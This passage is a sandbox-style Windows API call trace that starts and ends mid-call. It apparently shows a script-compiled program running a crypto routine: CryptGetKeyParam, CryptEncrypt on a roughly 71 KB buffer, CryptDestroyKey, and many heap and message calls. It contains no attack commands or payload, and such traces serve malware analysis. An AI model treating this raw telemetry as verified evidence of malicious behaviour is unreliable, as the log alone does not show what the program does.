wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.355] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.355] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.355] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.355] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.355] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.356] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.357] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.357] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1187d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x11880) returned 1 [0037.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.358] CharLowerBuffW (in: lpsz="byte[71809]", cchLength=0xb | out: lpsz="byte[71809]") returned 0xb [0037.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.359] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.359] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x946890*, pdwDataLen=0x6ae220*=0x1187d, dwBufLen=0x11880 | out: pbData=0x946890*, pdwDataLen=0x6ae220*=0x11880) returned 1 [0037.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.360] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0037.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.361] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.361] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.361] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.361] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.361] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.361] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.361] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.365] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.365] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.365] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.368] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.368] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.368] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.368] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.368] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.369] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.369] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.369] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.370] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.371] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.371] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.371] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 